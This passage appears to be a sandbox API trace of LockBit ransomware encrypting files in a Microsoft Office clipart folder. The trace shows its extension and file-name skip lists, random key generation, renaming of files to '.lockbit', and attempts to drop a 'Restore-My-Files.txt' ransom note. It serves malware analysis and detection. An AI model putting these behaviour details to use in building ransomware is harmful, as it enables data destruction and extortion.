LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.357] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.360] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0164.360] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0164.368] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02388_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02388_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.368] malloc (_Size=0xa6) returned 0x1fa2ed8 [0164.368] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0164.372] free (_Block=0x1fa2ed8) [0164.372] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02388_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0164.372] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0164.372] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0164.372] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a396cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02389_.WMF", cAlternateFileName="")) returned 1 [0164.373] lstrcmpiW (lpString1=".", lpString2="NA02389_.WMF") returned -1 [0164.373] lstrcmpiW (lpString1="..", lpString2="NA02389_.WMF") returned -1 [0164.373] PathFindExtensionW (pszPath="NA02389_.WMF") returned=".WMF" [0164.373] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0164.373] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0164.373] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0164.373] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0164.373] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0164.373] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0164.373] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0164.373] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0164.373] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0164.373] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0164.373] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0164.373] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0164.373] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0164.373] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0164.373] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0164.373] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0164.373] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0164.373] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0164.373] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0164.373] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0164.374] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0164.374] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0164.374] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0164.374] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0164.374] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.374] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0164.374] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0164.374] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0164.374] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0164.374] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0164.374] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0164.374] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0164.374] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0164.374] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0164.374] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0164.374] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0164.374] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0164.374] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0164.374] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0164.374] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0164.374] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0164.374] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0164.374] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.375] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0164.375] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0164.375] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0164.375] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0164.375] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02389_.WMF") returned 1 [0164.375] lstrcmpiW (lpString1="ntldr", lpString2="NA02389_.WMF") returned 1 [0164.375] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02389_.WMF") returned 1 [0164.375] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02389_.WMF") returned -1 [0164.375] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02389_.WMF") returned -1 [0164.375] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02389_.WMF") returned 1 [0164.375] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02389_.WMF") returned -1 [0164.375] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0164.375] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02389_.WMF") returned=".WMF" [0164.375] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0164.375] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0164.375] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0164.379] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0164.379] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0164.379] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0164.379] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0164.379] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0164.379] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0164.379] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0164.379] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0164.379] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0164.379] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0164.379] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0164.379] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0164.379] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0164.379] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0164.380] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0164.380] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0164.380] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0164.380] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0164.380] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0164.380] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0164.380] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0164.380] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0164.380] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0164.380] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0164.380] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0164.380] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02389_.WMF.lockbit") returned 72 [0164.380] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02389_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02389_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0164.384] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0164.384] malloc (_Size=0x40068) returned 0x1ff1e60 [0164.384] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2860) returned 1 [0164.384] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.385] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0164.385] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.385] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0164.385] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0164.394] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02389_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02389_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.394] malloc (_Size=0xa6) returned 0x1fa2ed8 [0164.394] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0164.396] free (_Block=0x1fa2ed8) [0164.396] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02389_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0164.396] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0164.396] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0164.396] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a396cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe64, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02390_.WMF", cAlternateFileName="")) returned 1 [0164.396] lstrcmpiW (lpString1=".", lpString2="NA02390_.WMF") returned -1 [0164.396] lstrcmpiW (lpString1="..", lpString2="NA02390_.WMF") returned -1 [0164.396] PathFindExtensionW (pszPath="NA02390_.WMF") returned=".WMF" [0164.396] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0164.396] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0164.396] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0164.396] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0164.396] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0164.396] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0164.396] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0164.396] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0164.397] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0164.397] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0164.397] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0164.397] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0164.397] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0164.397] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0164.397] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0164.397] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0164.397] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0164.397] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0164.397] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0164.397] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0164.397] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0164.397] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0164.397] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0164.397] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0164.397] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.397] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0164.397] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0164.397] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0164.397] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0164.397] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0164.398] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0164.398] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0164.398] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0164.398] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0164.398] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0164.398] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0164.398] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0164.398] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0164.398] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0164.398] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0164.398] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0164.398] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0164.398] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.398] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0164.398] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0164.398] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0164.398] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0164.398] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02390_.WMF") returned 1 [0164.398] lstrcmpiW (lpString1="ntldr", lpString2="NA02390_.WMF") returned 1 [0164.398] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02390_.WMF") returned 1 [0164.398] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02390_.WMF") returned -1 [0164.398] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02390_.WMF") returned -1 [0164.399] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02390_.WMF") returned 1 [0164.399] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02390_.WMF") returned -1 [0164.399] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0164.399] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02390_.WMF") returned=".WMF" [0164.399] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0164.399] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0164.399] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0164.399] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0164.399] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0164.399] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0164.399] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0164.399] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0164.399] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0164.399] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0164.399] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0164.399] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0164.399] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0164.399] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0164.400] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0164.400] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0164.400] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0164.400] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0164.400] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0164.400] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0164.400] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0164.400] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0164.400] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0164.400] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0164.400] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0164.400] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0164.400] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0164.400] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0164.400] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02390_.WMF.lockbit") returned 72 [0164.400] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02390_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02390_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0164.401] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0164.401] malloc (_Size=0x40068) returned 0x3d70450 [0164.401] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3684) returned 1 [0164.401] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.402] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0164.402] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.402] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0164.402] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0164.408] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02390_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02390_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.408] malloc (_Size=0xa6) returned 0x1fa2ed8 [0164.409] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0164.410] free (_Block=0x1fa2ed8) [0164.410] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02390_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0164.410] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0164.410] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0164.410] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a396cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1e98, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02398_.WMF", cAlternateFileName="")) returned 1 [0164.410] lstrcmpiW (lpString1=".", lpString2="NA02398_.WMF") returned -1 [0164.410] lstrcmpiW (lpString1="..", lpString2="NA02398_.WMF") returned -1 [0164.410] PathFindExtensionW (pszPath="NA02398_.WMF") returned=".WMF" [0164.410] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0164.411] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0164.411] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0164.411] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0164.411] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0164.411] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0164.411] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0164.411] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0164.411] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0164.411] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0164.411] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0164.411] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0164.411] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0164.411] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0164.411] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0164.411] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0164.411] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0164.411] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0164.411] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0164.411] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0164.411] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0164.412] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0164.412] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0164.412] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0164.412] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.412] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0164.412] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0164.412] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0164.412] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0164.412] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0164.412] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0164.412] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0164.412] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0164.412] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0164.412] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0164.412] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0164.412] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0164.412] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0164.412] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0164.412] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0164.412] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0164.413] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0164.413] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.413] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0164.413] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0164.413] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0164.413] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0164.413] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02398_.WMF") returned 1 [0164.413] lstrcmpiW (lpString1="ntldr", lpString2="NA02398_.WMF") returned 1 [0164.413] lstrcmpiW (lpString1="ntuser.dat.log", 